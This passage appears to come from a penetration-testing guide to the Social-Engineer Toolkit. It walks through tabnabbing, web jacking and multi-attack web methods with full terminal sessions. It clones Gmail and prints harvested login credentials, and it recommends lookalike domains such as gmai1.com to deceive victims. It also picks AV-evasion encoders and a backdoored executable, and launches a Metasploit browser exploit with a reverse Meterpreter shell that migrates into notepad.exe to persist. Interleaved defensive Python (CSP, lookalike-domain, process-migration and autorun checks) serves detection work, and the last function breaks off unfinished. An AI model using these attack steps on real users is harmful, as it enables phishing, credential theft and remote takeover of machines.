root@bt:/pentest/exploits/set# firefox reports/2010-09-09\
10\:14\:30.152435.html

Tabnabbing Attack Method


The tabnabbing attack method is used when a victim has multiple tabs open. When the user
clicks the link, the victim is presented with a "Please wait while the page loads" message.
When the victim switches tabs because he/she is multi-tasking, the website detects that a
different tab is active and rewrites the webpage to a website you specify. The victim clicks
back on the tab after a period of time, thinks they were signed out of their email program or
their business application, and types the credentials in. When the credentials are entered,
they are harvested and the user is redirected back to the original website.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 4

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

The victim is presented with a webpage that says please wait while the page loads.

When the victim switches tabs, the website is rewritten; the victim then enters the
credentials and they are harvested.

[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-9060819085229816070
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=00-69E-Tt5g
POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT

Man Left in the Middle Attack Method


The man left in the middle attack uses HTTP referers on an already compromised site or an
XSS vulnerability to pass the credentials back to the HTTP server. In this instance, if you
find an XSS vulnerability and send the URL to the victim and they click it, the website
operates completely normally; however, when they log into the system, it passes the
credentials back to the attacker, who harvests them.
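The injected <script src="http://YOURIP/"> that this method depends on only runs if the page's Content-Security-Policy lets the browser fetch scripts from an arbitrary host, which is why a script-src allow list is the standard mitigation. The following is an added example (not SET's code) that evaluates a CSP header against a script origin; the policies, the page origin mail.example and the script host 203.0.113.5 (standing in for YOURIP) are constructed placeholders.

```python
"""Check whether a Content-Security-Policy would allow an injected external
script (the <script src="http://YOURIP/"> the man-left-in-the-middle
method needs) to load.

Added example, not SET code. Covers the common source expressions:
'none', 'self', *, scheme sources such as https:, and host sources with
an optional *. wildcard and port. Nonces, hashes and 'strict-dynamic'
are not modelled.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source, ...]} (all lowercased)."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def _effective_port(parts):
    """Explicit port, else the default port for the URL's scheme."""
    return parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)


def _scheme_matches(source_scheme: str, url_scheme: str) -> bool:
    # CSP treats an http: source as also permitting the https upgrade.
    return source_scheme == url_scheme or (source_scheme == "http" and url_scheme == "https")


def _host_source_matches(source: str, script) -> bool:
    """Match host sources like https://cdn.example, *.example or host:8443."""
    src = urlsplit(source if "://" in source else "//" + source)
    if src.scheme and not _scheme_matches(src.scheme, script.scheme):
        return False
    src_host, host = src.hostname or "", script.hostname or ""
    if src_host.startswith("*."):
        if not host.endswith(src_host[1:]):      # wildcard needs a real subdomain
            return False
    elif src_host != host:
        return False
    if src.port is not None:
        return src.port == _effective_port(script)
    # No port in the source: the URL must use the default port for its scheme.
    return _effective_port(script) == DEFAULT_PORTS.get(script.scheme)


def script_allowed(csp_header: str, page_origin: str, script_url: str) -> bool:
    """True when a page served from page_origin with this CSP may load script_url."""
    policy = parse_csp(csp_header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True                          # no directive governs scripts at all
    if sources == ["'none'"]:
        return False
    script, page = urlsplit(script_url), urlsplit(page_origin)
    for src in sources:
        if src == "*":
            return True                      # any host, including the attacker's
        if src == "'self'":
            if (script.scheme, script.hostname, _effective_port(script)) == \
                    (page.scheme, page.hostname, _effective_port(page)):
                return True
        elif src.startswith("'"):
            continue                         # 'unsafe-inline', nonces, hashes: not modelled
        elif src.endswith(":") and "/" not in src:
            if _scheme_matches(src[:-1], script.scheme):
                return True                  # scheme source such as http: or https:
        elif _host_source_matches(src, script):
            return True
    return False
```

A policy that passes for http://203.0.113.5/ (for example one containing http: or *) is the weak setting to look for in a header review; a 'self' plus named CDN list is the corrected one.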
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 5


***************************************************
Web Server Launched. Welcome to the SET MLTM.
***************************************************
Man Left in the Middle Attack brought to you by:
Kyle Osborn - kyle@kyleosborn.com
Starting server on 0.0.0.0:80...
[*] Server has started

Web Jacking Attack Method


The web jacking attack method creates a website clone and presents the victim with a link
stating that the website has moved. This is a new feature in version 0.7. When you hover
over the link, the URL shown is the real URL, not the attacker's machine. So, for example, if
you're cloning gmail.com, the URL shown when hovering over the link would be gmail.com.
When the user clicks the moved link, gmail opens and is then quickly replaced with your
malicious webserver. Remember you can change the timing of the webjacking attack in the
config/set_config flags.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 6

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

When the victim goes to the site he/she will notice the link below; notice the bottom-left
URL, it's gmail.com.

When the victim clicks the link he is presented with the following webpage:

If you notice the URL bar, we are at our malicious web server. In social-engineering cases
you want to make it believable, and using an IP address is generally a bad idea. My
recommendation is that if you're doing a penetration test, register a name that's similar to
the victim's; for gmail you could do gmai1.com (notice the 1), something similar that can
mislead the user into thinking it's the legitimate site. Most of the time they won't even
notice the IP, but it's just another way to ensure it goes off without a hitch. Now that the
victim enters the username and password in the fields, you will notice that we can intercept
the credentials.
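The gmai1.com lure above is exactly what a brand-protection or mail-filtering check should catch. As an added example (not SET's code), the following flags a domain that resembles a protected one after undoing common digit-for-letter and glyph-pair substitutions, or that is one edit (including a transposition) away from it; the protected list, the substitution tables and the candidate domains are constructed.

```python
"""Flag domains that look like a protected domain (e.g. gmai1.com vs
gmail.com), the kind of lure the web jacking method relies on.

Added example, not SET code. A lookalike is reported when the registrable
label equals a protected label under a different TLD, matches it after
undoing common substitutions, or is within a small edit distance of it.
"""

# Single characters commonly swapped for letters in lookalike names
# (constructed table, extend as needed).
HOMOGLYPHS = {"1": "l", "|": "l", "!": "i", "0": "o", "5": "s",
              "3": "e", "4": "a", "7": "t", "8": "b", "9": "g"}
# Two-character sequences that render like one letter.
PAIR_GLYPHS = {"rn": "m", "vv": "w", "cl": "d"}


def registrable_label(domain: str) -> str:
    """'accounts.gmai1.com' -> 'gmai1'. Assumes a one-label public suffix
    (.com, .net); production code should consult the Public Suffix List."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def normalise(label: str) -> str:
    """Undo the substitutions an attacker uses to imitate a label."""
    for pair, letter in PAIR_GLYPHS.items():
        label = label.replace(pair, letter)
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in label)


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute or
    swap two adjacent characters each cost 1 (so gmial vs gmail is 1)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def lookalike_verdict(candidate: str, protected: list, max_distance: int = 1):
    """Return (reason, protected_domain) when candidate imitates a protected
    domain, or None when it is the real domain, its subdomain, or unrelated."""
    cand = candidate.lower().strip(".")
    for domain in protected:
        legit = domain.lower()
        if cand == legit or cand.endswith("." + legit):
            return None                      # the real site or one of its subdomains
    cand_label = registrable_label(cand)
    cand_norm = normalise(cand_label)
    for domain in protected:
        label = registrable_label(domain)
        if cand_label == label:
            return ("other-tld", domain)     # gmail.net imitating gmail.com
        if cand_norm == label:
            return ("homoglyph", domain)     # gmai1.com, rnail.example
        if osa_distance(cand_norm, label) <= max_distance:
            return ("edit-distance", domain)  # gmial.com, gmal.com
    return None
```

Distance-based matches need an allow list of legitimate neighbours (mail.com is one edit from gmail.com), so treat the verdict as a signal for review rather than a blocking decision.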
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 -
172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7017428156907423605
PARAM: ltmpl=default

PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=0JsVTaj70sk
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
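The advice above about look-alike names such as gmai1.com is exactly what a defender should be screening for in proxy logs or inbound mail. The following is an added example, not part of SET or of this book: it folds confusable characters and measures edit distance against a small, constructed list of protected brand names, and also catches a brand name buried in the subdomain of an unrelated domain.

```python
"""Look-alike (typosquat) domain screening.

Added example, not SET's or the book's own code. PROTECTED_LABELS and the
sample hosts are constructed; only single-label TLDs such as .com/.net
are handled (no public-suffix list is consulted).
"""
from typing import Optional

# Second-level labels the defender wants to protect (constructed list).
PROTECTED_LABELS = {"gmail", "google", "paypal"}

# Character sequences commonly substituted for a letter they resemble,
# mapped to the letter they imitate. Longer sequences are applied first.
CONFUSABLES = {
    "rn": "m", "vv": "w", "cl": "d",
    "1": "l", "|": "l", "!": "l",
    "0": "o", "3": "e", "5": "s",
}


def normalise(label: str) -> str:
    """Fold a label into the visually canonical form a reader perceives."""
    s = label.lower()
    for seq, canon in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        s = s.replace(seq, canon)
    return s


def levenshtein(a: str, b: str) -> int:
    """Edit distance; labels are short, so a plain two-row DP is enough."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str, max_distance: int = 1) -> Optional[str]:
    """Return the protected label that `host` imitates, or None.

    The genuine domain and its subdomains (mail.google.com) are not
    look-alikes. Two tricks are caught: a confusable/edit-distance match
    on the registrable label (gmai1.com, rnail.com) and a protected name
    used as a subdomain of an unrelated domain (gmail.com.evil.net).
    """
    parts = host.lower().strip(".").split(".")
    if len(parts) < 2:
        return None
    registrable, subdomains = parts[-2], parts[:-2]
    if registrable in PROTECTED_LABELS:
        return None
    folded = normalise(registrable)
    for brand in sorted(PROTECTED_LABELS):
        if folded == brand or levenshtein(folded, brand) <= max_distance:
            return brand
    for sub in subdomains:
        if normalise(sub) in PROTECTED_LABELS:
            return normalise(sub)
    return None


def screen_hosts(hosts):
    """Map each host to the brand it imitates; hosts judged clean are omitted."""
    return {h: b for h in hosts if (b := lookalike_of(h)) is not None}
```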

Multi-Attack Web Vector


The multi-attack web vector is new to 0.7 and allows you to specify multiple web attack methods in order to perform a single attack. In some scenarios the Java Applet may fail while an Internet Explorer exploit succeeds, or both the Java Applet and the Internet Explorer exploit fail and the credential harvester succeeds. The multi-attack vector lets you turn the different vectors on and off and combine them all into one specific web page, so when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note is that you cannot use Tabnabbing, Cred Harvester or Web Jacking together with the Man Left in the Middle attack; given how those vectors work, they should not be combined anyway. Let's take a look at the multi-attack vector. In this scenario I am going to turn on the Java Applet attack, the Metasploit client-side exploit and the Web Jacking attack. When the victim browses to the site, he/she will need to click on the link and will then be hit with the credential harvester, the Metasploit exploits and the Java applet attack. I am intentionally going to select an Internet Explorer 7 exploit and browse with IE6, just to demonstrate that if one method fails, we have others.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 7

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your
choosing and allow you to utilize the attack vectors within
the completely same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'Im finished' option.
Select which attacks you want to use:
1. The Java Applet Attack Method (OFF)
2. The Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 1


Turning the Java Applet Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'Im finished' option.
Select which attacks you want to use:
1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (OFF)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 2


Turning the Metasploit Client Side Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'Im finished' option.
Select which attacks you want to use:
1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (OFF)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 6


Turning the Web Jacking Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'Im finished' option.
Select which attacks you want to use:
1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (ON)
4. Tabnabbing Attack Method (OFF)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (ON)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch):

Conversely, you can use the Tactical Nuke option (option 7), which enables all of the attack vectors automatically for you. In this example you can see the flags change: the Java Applet, Metasploit Browser Exploit, Credential Harvester and Web Jacking attack methods have all been enabled. To proceed, hit enter or use option 8.
Enter your choice one at a time (hit 8 or enter to launch):
What payload do you want to generate:

  Name:                                     Description:

  1. Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker.
  2. Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker.
  3. Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker.
  4. Windows Bind Shell                     Execute payload and create an accepting port on remote system.
  5. Windows Bind Shell X64                 Windows x64 Command Shell, Bind TCP Inline
  6. Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline
  7. Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter
  8. Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports
  9. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default):


Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)

12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):


[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit
executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no: no
Enter the browser exploit you would like to use
1. Microsoft Windows WebDAV Application DLL Hijacker
2. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
3. Microsoft Windows Shell LNK Code Execution (MS10-046)
4. Microsoft Help Center XSS and Command Execution (MS10-042)
5. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
6. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
7. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
9. Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
10. Internet Explorer isComponentInstalled Overflow
11. Internet Explorer Explorer Data Binding Corruption (MS08-078)
12. Internet Explorer Unsafe Scripting Misconfiguration
13. FireFox 3.5 escape Return Value Memory Corruption
Enter your choice (1-12) (enter for default): 8
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment

[*] Injecting iframes into cloned website for MSF Attack....


[*] Malicious iframe injection successful...crafting payload.

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use windows/browser/ms09_002_memory_corruption
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.

Now that we have everything running, let's browse to the website and see what is there. We are first greeted with a "the site has been moved" page.

We click the link and are hit with a Metasploit exploit; look at the handler on the back end.
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 172.16.32.131:1329...
msf exploit(ms09_002_memory_corruption) >

This exploit fails because we are using Internet Explorer 6. Once it fails, check out the victim's screen:

We hit Run, and we have a Meterpreter shell. In this instance we would be redirected back to the original Google page because the attack was successful. Also notice that when using the Java Applet we automatically migrate to a separate process, which happens to be notepad.exe. The reason is that if the victim closes the browser we are safe, because closing that process will not terminate our Meterpreter shell.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at
Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
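The migration into notepad.exe shown in the session above is a strong host-side signal for defenders: a browser-launched java.exe has no business spawning notepad.exe, and notepad.exe has no business opening a TCP connection. The following is an added example, not Metasploit, SET or this book's code; it runs two such rules over a constructed list of Sysmon-style process-create and network-connect records (PIDs and addresses mirror the session output, the image paths are made up) and correlates the hits per PID.

```python
"""Detect the migration pattern in the session above: java.exe (the applet)
spawns notepad.exe, and notepad.exe then opens an outbound connection.

Added example, not Metasploit's, SET's or the book's code. EVENTS is a
constructed list shaped like Sysmon Event ID 1 (ProcessCreate) and
Event ID 3 (NetworkConnect) records; PIDs and addresses mirror the
session in the text, the image paths are invented.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Images that have no business making outbound connections.
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}
# Parents that should not be spawning such host processes.
SUSPICIOUS_PARENTS = {"java.exe", "iexplore.exe", "firefox.exe", "chrome.exe"}

EVENTS: List[Dict] = [
    {"id": 1, "pid": 824, "image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "parent_pid": 940, "parent_image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 1, "pid": 3044, "image": r"C:\WINDOWS\system32\notepad.exe",
     "parent_pid": 824, "parent_image": r"C:\Program Files\Java\jre6\bin\java.exe"},
    {"id": 3, "pid": 3044, "image": r"C:\WINDOWS\system32\notepad.exe",
     "dest_ip": "172.16.32.129", "dest_port": 443},
    # Benign control: notepad opened by the user from the desktop, no network activity.
    {"id": 1, "pid": 1200, "image": r"C:\WINDOWS\system32\notepad.exe",
     "parent_pid": 768, "parent_image": r"C:\WINDOWS\Explorer.exe"},
]

Alert = Tuple[str, int, str]  # (rule, pid, detail)


def basename(image: str) -> str:
    """Last path component, lower-cased, so rules match on the image name only."""
    return image.rsplit("\\", 1)[-1].lower()


def evaluate(events: List[Dict]) -> List[Alert]:
    """Apply the two per-event rules and return every alert raised."""
    alerts: List[Alert] = []
    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 1:
            parent = basename(ev["parent_image"])
            if img in NO_NETWORK_IMAGES and parent in SUSPICIOUS_PARENTS:
                alerts.append(("suspicious_parent", ev["pid"],
                               f"{parent} (pid {ev['parent_pid']}) spawned {img}"))
        elif ev["id"] == 3 and img in NO_NETWORK_IMAGES:
            # Port is deliberately ignored: 443 is chosen to blend in with HTTPS.
            alerts.append(("unexpected_network", ev["pid"],
                           f"{img} -> {ev['dest_ip']}:{ev['dest_port']}"))
    return alerts


def probable_migrations(alerts: List[Alert]) -> List[int]:
    """PIDs that tripped both rules: the strongest sign of an injected
    Meterpreter host process surviving the browser being closed."""
    rules_by_pid = defaultdict(set)
    for rule, pid, _ in alerts:
        rules_by_pid[pid].add(rule)
    wanted = {"suspicious_parent", "unexpected_network"}
    return sorted(pid for pid, rules in rules_by_pid.items() if wanted <= rules)
```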

Let's say that this attack failed and the user hit Cancel. He would then be prompted to enter his/her username and password into the username/password fields.
[*] WE GOT A HIT! Printing the output:

PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?ui=html
PARAM: zy=l
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-8578216484479049837
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=fYQL_bXkbzU
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT

Infectious Media Generator


As previously mentioned, the Infectious Media Generator is a relatively simple attack vector. SET will create a Metasploit-based payload, set up a listener for you and generate a folder that needs to be burned to a DVD or written to a USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine.
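The defensive counterpart to the autorun.inf that SET drops into its autorun folder is to inspect that file before trusting removable media. Below is an added example, not SET's or the book's code, that parses constructed autorun.inf samples and flags the open=, shellexecute= and shell\<verb>\command= entries that would launch a program, treating an unparseable file as hostile.

```python
"""Audit an autorun.inf before a removable drive is trusted.

Added example, not SET's or the book's code. Both samples are constructed:
one resembles a dropper's autorun.inf with a friendly action label, the
other a harmless labelled drive. The defence is to read the file and refuse
any drive whose autorun.inf names something to execute.
"""
import configparser
from typing import List, Tuple

# Constructed sample: an executable entry disguised with a folder-like action.
MALICIOUS_SAMPLE = """[AutoRun]
open=setup.exe
icon=drive.ico
action=Open folder to view files
shell\\explore\\command=setup.exe
"""

# Constructed sample: only cosmetic keys, nothing to execute.
BENIGN_SAMPLE = """[autorun]
label=Backup Disk
icon=disk.ico
"""

Finding = Tuple[str, str, str]  # (severity, key, value)


def parse_autorun(text: str) -> configparser.ConfigParser:
    """Windows treats section and key names case-insensitively, so fold
    section headers to lower case; configparser lower-cases keys itself.
    strict=False tolerates the duplicate keys seen in sloppy files."""
    folded = "\n".join(
        line.strip().lower() if line.strip().startswith("[") else line
        for line in text.splitlines()
    )
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(folded)
    return cp


def audit_autorun(text: str) -> List[Finding]:
    """Return findings; an empty list means nothing in the file can run code."""
    try:
        cp = parse_autorun(text)
    except configparser.Error:
        return [("high", "unparseable", "file could not be parsed; treat as hostile")]
    findings: List[Finding] = []
    if not cp.has_section("autorun"):
        return findings
    sect = cp["autorun"]
    # open= and shellexecute= run as soon as AutoRun fires on media insertion.
    for key in ("open", "shellexecute"):
        if sect.get(key):
            findings.append(("high", key, sect[key]))
    # shell\<verb>\command= runs when the user double-clicks the drive or picks
    # the verb from its context menu, so it survives AutoRun being disabled.
    for key, value in sect.items():
        if key.startswith("shell\\") and key.endswith("\\command") and value:
            findings.append(("medium", key, value))
    # Cosmetic keys are harmless alone but, next to an executable entry,
    # exist to make the drive look like an ordinary folder.
    if findings and (sect.get("action") or sect.get("icon") or sect.get("label")):
        findings.append(("info", "disguise", "action/icon/label masks the executable entry"))
    return findings


def drive_is_safe(text: str) -> bool:
    """True only when no finding of high or medium severity was raised."""
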